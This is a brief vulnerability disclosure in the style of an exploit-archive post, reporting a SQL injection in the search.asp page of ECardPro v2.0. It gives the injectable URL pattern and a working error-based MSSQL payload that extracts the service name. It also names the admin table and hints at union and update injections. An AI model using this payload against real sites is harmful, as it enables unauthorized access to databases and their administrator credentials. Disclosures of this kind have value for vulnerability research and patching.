Vulnerability Report

************************************************************************
*******

# Title  :  ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.keyvan1.com

# Exploit;

************************************************************************
*******

Data: MSSQL

###http://[target]/[path]/search.asp?keyword='[SQL HERE]

Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL Service Name

Admin Table: "admin"

etc(systemtables,union,update,select)......

# ajann,Turkey

# ...

# Im not Hacker!